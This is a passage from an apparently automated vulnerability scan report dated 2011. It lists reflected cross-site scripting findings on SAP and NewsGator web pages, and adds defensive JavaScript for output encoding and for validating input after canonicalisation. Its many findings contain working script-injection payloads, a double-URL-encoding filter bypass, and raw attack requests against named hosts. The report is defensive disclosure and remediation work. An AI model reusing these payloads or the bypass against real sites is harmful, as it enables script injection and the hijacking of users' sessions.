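The finding above is the one case in this report where no escaping of quotes can help: the parameter name lands inside an object literal, `extraArgs:{...}`, as an unquoted expression, so a name such as `64204;alert(1)//95fd43ea14` is parsed as code rather than as a property name. The example below is added here and is not code from the scan report or from the NewsGator or SAP applications; the server-side code that emits `extraArgs:{...}` is not on the page, so the vulnerable builder is an assumed reconstruction of the pattern, and the request parameters are constructed from the scanner's payload. It shows the string-concatenation builder beside one that serialises the whole object with `JSON.stringify`, which turns every key and value into a quoted, escaped string.

```javascript
// Added example; not code from the scan report or from the NewsGator/SAP
// application. The server-side code that emits "extraArgs:{...}" is not on
// the page, so the vulnerable builder below is an assumed reconstruction.

// Assumed vulnerable pattern: each request-parameter NAME is concatenated
// directly into a JavaScript object literal, so it lands in an unquoted
// expression context where quote-escaping of the VALUE is irrelevant.
function buildExtraArgsVulnerable(params) {
  const pairs = [];
  for (const [name, value] of params) {
    pairs.push(name + ":'" + value.replace(/'/g, "\\'") + "'");
  }
  return 'extraArgs:{' + pairs.join(',') + '}';
}

// Hardened pattern: let JSON.stringify produce the whole literal. Every key
// and value becomes a quoted, escaped JSON string, so the name
// 64204;alert(1)//95fd43ea14 can only ever be a property name, never code.
// "<" is rewritten as \u003c so the fragment cannot contain "</script>"
// once it is inlined inside a <script> element.
function buildExtraArgsSafe(params) {
  const obj = {};
  for (const [name, value] of params) obj[name] = value;
  return 'extraArgs:' + JSON.stringify(obj).replace(/</g, '\\u003c');
}

// Evaluate a generated fragment the way the browser would, as part of an
// object literal, and hand back extraArgs. For the safe fragment the
// injected name must come back as an ordinary string-keyed property.
function extraArgsOf(fragment) {
  return new Function('return {' + fragment + '}.extraArgs;')();
}

// Constructed input: the parameter name the scanner used in issue 3.36.
const SCAN_PARAMS = [
  ['buzzId', '215423'],
  ['64204;alert(1)//95fd43ea14', '1'],
];

console.log(buildExtraArgsVulnerable(SCAN_PARAMS));
// extraArgs:{buzzId:'215423',64204;alert(1)//95fd43ea14:'1'}
console.log(buildExtraArgsSafe(SCAN_PARAMS));
// extraArgs:{"buzzId":"215423","64204;alert(1)//95fd43ea14":"1"}
```

Serialising the object is the fix because it removes the unquoted position altogether; the remaining risk is `</script>` inside a string, which the `\u003c` rewrite handles. If the application cannot control which parameter names reach the template, an allow-list of expected names is the other half of the remediation.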
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4ee84<script>alert(1)</script>910c67c89ad was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload bd310<img%20src%3da%20onerror%3dalert(1)>7e3be76c3d4 was submitted in the mbox parameter. This input was echoed as bd310<img src=a onerror=alert(1)>7e3be76c3d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload d7f05<script>alert(1)</script>7762cc0ab06 was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 56ff3<script>alert(1)</script>1c85f2b1615 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mboxFactoryId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f841'%3balert(1)//e40655f8366 was submitted in the mboxFactoryId parameter. This input was echoed as 8f841';alert(1)//e40655f8366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 1af53<img%20src%3da%20onerror%3dalert(1)>2257775d063 was submitted in the msessionkey parameter. This input was echoed as 1af53<img src=a onerror=alert(1)>2257775d063 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 1cc9d<img%20src%3da%20onerror%3dalert(1)>4e366a67b73 was submitted in the msessionkey parameter. This input was echoed as 1cc9d<img src=a onerror=alert(1)>4e366a67b73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4d316<img%20src%3da%20onerror%3dalert(1)>4a39ca00ecc was submitted in the mbox parameter. This input was echoed as 4d316<img src=a onerror=alert(1)>4a39ca00ecc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 785ad<script>alert(1)</script>e8955e63c5c was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6586a"%3balert(1)//f4427f5b16c was submitted in the lang parameter. This input was echoed as 6586a";alert(1)//f4427f5b16c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf request parameter is copied into the HTML document as plain text between tags. The payload bd785<script>alert(1)</script>1c5f68d385a was submitted in the 39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66fe1"><script>alert(1)</script>8b27daf9eeb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg66fe1"><script>alert(1)</script>8b27daf9eeb HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1279
3.49. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://weblogs.sdn.sap.com
Path:
/cs/user/create/cs_msg
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39359"><script>alert(1)</script>322e7d1fcaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg?39359"><script>alert(1)</script>322e7d1fcaf=1 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1282
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19070"><script>alert(1)</script>c23af16cf20 was submitted in the page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/26917&page=19070"><script>alert(1)</script>c23af16cf20 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:50 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1315
The value of the x-lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80cf2"><script>alert(1)</script>80a4f10b6b was submitted in the x-lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg?x-lr=cs_disc/80cf2"><script>alert(1)</script>80a4f10b6b&x-lr2=wlg/26917&page= HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:48 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1314
The value of the x-lr2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e302"><script>alert(1)</script>4898dfa5535 was submitted in the x-lr2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302"><script>alert(1)</script>4898dfa5535&page= HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:49 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1315
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7052c%253balert%25281%2529%252f%252f161ddd4d8be was submitted in the REST URL parameter 4. This input was echoed as 7052c;alert(1)//161ddd4d8be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bcb6"><script>alert(1)</script>10d38451814 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 43cae%253balert%25281%2529%252f%252f4db97354d1c was submitted in the REST URL parameter 5. This input was echoed as 43cae;alert(1)//4db97354d1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
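The two REST URL parameter findings above share one root cause: the application validates a value and then decodes it a second time, so characters that were invisible to the filter (`%253b` is `%3b` after the web server's decode, and only becomes `;` on the application's own decode) reappear in the output. The example below is added here and is not code from the scan report or from the SAP application; the filter, the handler functions and the decode ordering are assumptions that reproduce the behaviour the scanner describes, and the payload is the one shown for REST URL parameter 4. It places the decode-validate-decode handler beside two fixed variants: decode once and validate what will actually be used, or, when a second decode is unavoidable, canonicalise fully and validate afterwards.

```javascript
// Added example; not the scan report's or the SAP application's code. The
// filter and handlers are assumed reconstructions of the ordering the
// scanner reports for REST URL parameters 4 and 5 on weblogs.sdn.sap.com.

// A blacklist filter of the kind the scanner describes: it rejects the raw
// characters usually needed to break out of a script context.
const BLOCKED = /[<>"';]/;
function passesFilter(value) {
  return !BLOCKED.test(value);
}

// What the web server hands to the application: the path segment after ONE
// round of percent-decoding. The scanner's payload leaves the client as
// 7052c%253balert%25281%2529%252f%252f161ddd4d8be.
function serverDecode(rawSegment) {
  return decodeURIComponent(rawSegment);
}

// Assumed vulnerable handler: validates the once-decoded value, then decodes
// it AGAIN before echoing it into a JavaScript expression. The filter never
// sees the ';' because at validation time it is still the text "%3b".
function handleVulnerable(rawSegment) {
  const once = serverDecode(rawSegment);
  if (!passesFilter(once)) return { status: 400, echoed: null };
  const twice = decodeURIComponent(once);     // the needless second decode
  return { status: 200, echoed: twice };
}

// Fix 1, as the remediation note suggests: the server already decoded once,
// so use that value as-is and validate exactly what will be echoed.
function handleFixed(rawSegment) {
  const value = serverDecode(rawSegment);
  if (!passesFilter(value)) return { status: 400, echoed: null };
  return { status: 200, echoed: value };
}

// Fix 2, when a second decode is genuinely required: canonicalise until the
// value stops changing, and only then validate. Validation after
// canonicalisation is the rule; the number of decode rounds is a detail.
function handleCanonicalised(rawSegment) {
  let value = serverDecode(rawSegment);
  let prev;
  do {
    prev = value;
    try { value = decodeURIComponent(value); } catch (e) { break; }
  } while (value !== prev);
  if (!passesFilter(value)) return { status: 400, echoed: null };
  return { status: 200, echoed: value };
}

// Constructed input: the scanner's double-encoded payload from above.
const PAYLOAD = '7052c%253balert%25281%2529%252f%252f161ddd4d8be';

console.log(handleVulnerable(PAYLOAD));
// { status: 200, echoed: '7052c;alert(1)//161ddd4d8be' }
console.log(handleFixed(PAYLOAD));
// { status: 200, echoed: '7052c%3balert%281%29%2f%2f161ddd4d8be' }
console.log(handleCanonicalised(PAYLOAD));
// { status: 400, echoed: null }
```

`handleFixed` echoes the literal text `%3b`, which is harmless in a script context; `handleCanonicalised` rejects the request because, once fully decoded, the value contains `;`. Either ordering closes the bypass; what matters is that no decode step runs after the validation step.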
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f0e85<script>alert(1)</script>334b249d7a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
3.57. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d3da<script>alert(1)</script>c5f0d095866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the x-redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59301"><script>alert(1)</script>f5151cfe29d was submitted in the x-redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the x-redirect request parameter is copied into the HTML document as plain text between tags. The payload 85ee1<script>alert(1)</script>875fad350be was submitted in the x-redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 2nd AMF string parameter is copied into the HTML document as plain text between tags. The payload 959bb<script>alert(1)</script>75f3445b5e2 was submitted in the 2nd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the b request parameter is copied into the HTML document as plain text between tags. The payload d2745<script>alert(1)</script>43dc6059987 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 4d3c4<script>alert(1)</script>6eee8615daf was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload cb700<script>alert(1)</script>2eeb76a371d was submitted in the path parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the scbcolor request parameter is copied into the HTML document as plain text between tags. The payload 7729e<script>alert(1)</script>549d8b0ab75 was submitted in the scbcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tbcolor request parameter is copied into the HTML document as plain text between tags. The payload 3ef75<script>alert(1)</script>b231ec5942f was submitted in the tbcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tipbcolor request parameter is copied into the HTML document as plain text between tags. The payload a95e1<script>alert(1)</script>200e6e3d8d3 was submitted in the tipbcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tipbgcolor request parameter is copied into the HTML document as plain text between tags. The payload a8b57<script>alert(1)</script>18fd0034016 was submitted in the tipbgcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tipborderw request parameter is copied into the HTML document as plain text between tags. The payload 2deae<script>alert(1)</script>d190c5c2481 was submitted in the tipborderw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tiptcolor request parameter is copied into the HTML document as plain text between tags. The payload bd29b<script>alert(1)</script>421f7dd0323 was submitted in the tiptcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tipw request parameter is copied into the HTML document as plain text between tags. The payload d0f9a<script>alert(1)</script>5291c05a6e9 was submitted in the tipw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 4cbfd<script>alert(1)</script>1a6c591f3ee was submitted in the w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
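The long run of findings above falls into two HTML contexts: input reflected as plain text between tags (where `<script>alert(1)</script>` or `<img src=a onerror=alert(1)>` becomes markup) and input reflected inside a double-quoted attribute value (where `"><script>` closes the attribute and the tag). The example below is added here and is not code from the scan report or from any of the scanned SAP or NewsGator sites; the page templates are constructed for the demonstration and the inputs are the scanner's own payloads. It shows a context-aware HTML encoder and a minimal check a reviewer can apply to rendered output: after encoding, the only tags in the document are the template's own.

```javascript
// Added example; not code from the scan report or from the scanned sites.
// Templates below are constructed for the demonstration.

// Encode for the HTML text context. The five characters that can open a tag
// or entity, or end an attribute, become entities. "/" is encoded as well;
// it is harmless and protects templates that later move the value into a
// tag or attribute without re-encoding.
const HTML_MAP = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (c) => HTML_MAP[c]);
}

// Encode for a double-quoted attribute value. The same table suffices
// because the double quote is encoded, so the value can never close the
// attribute. Unquoted attributes would need a much stricter encoding;
// always quote attribute values in templates.
function encodeForHtmlAttribute(value) {
  return encodeForHtml(value);
}

// Assumed vulnerable template: raw interpolation into an attribute and
// into text, the two situations reported above.
function renderVulnerable(msgId, page) {
  return '<input type="hidden" name="page" value="' + page + '">' +
         '<p>Message: ' + msgId + '</p>';
}

// Hardened template: each interpolation is encoded for its own context.
function renderSafe(msgId, page) {
  return '<input type="hidden" name="page" value="' + encodeForHtmlAttribute(page) + '">' +
         '<p>Message: ' + encodeForHtml(msgId) + '</p>';
}

// Reviewer's check: count tag openers ("<" followed by a letter). The safe
// output must contain exactly the two the template itself writes.
function countTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

// Constructed inputs, taken from the scanner's payloads above.
const TEXT_PAYLOAD = 'bd310<img src=a onerror=alert(1)>7e3be76c3d4';
const ATTR_PAYLOAD = '19070"><script>alert(1)</script>c23af16cf20';

console.log(countTags(renderVulnerable(TEXT_PAYLOAD, ATTR_PAYLOAD))); // 4
console.log(countTags(renderSafe(TEXT_PAYLOAD, ATTR_PAYLOAD)));       // 2
```

Encoding on output, per context, is what the remediation requires; input validation alone is the defence that the double-decoding findings earlier on this page show being bypassed. Note that `encodeForHtml` is not suitable for values placed inside `<script>` blocks or in URL attributes such as `href`; those contexts need their own encoders.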
3.72. http://www.sap.com/about-sap/company/legal/privacy.epx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sap.com
Path:
/about-sap/company/legal/privacy.epx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6627b"><script>alert(1)</script>0b3746ad6a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb837'%3b4803d0e7d8 was submitted in the REST URL parameter 1. This input was echoed as cb837';4803d0e7d8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a3e9'%3b52bfc88d5b0 was submitted in the REST URL parameter 1. This input was echoed as 9a3e9';52bfc88d5b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e035'%3b9a389115ce5 was submitted in the REST URL parameter 1. This input was echoed as 9e035';9a389115ce5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76071'%3b8141102f30b was submitted in the REST URL parameter 1. This input was echoed as 76071';8141102f30b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db64f'%3b76e111cc207 was submitted in the REST URL parameter 1. This input was echoed as db64f';76e111cc207 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f647'%3bc388078568b was submitted in the REST URL parameter 1. This input was echoed as 4f647';c388078568b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34382
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:28 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:28 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:28 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:27 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='gwtservice.epx4f647';c388078568b?vid=51A3D747-8C02-417D-8F96-AE6E0DDD405D&ReturnURL=http:'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 597d9'%3bc31b6b8d8f4 was submitted in the REST URL parameter 1. This input was echoed as 597d9';c31b6b8d8f4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:14 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:14 GMT
Content-Length: 8490
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
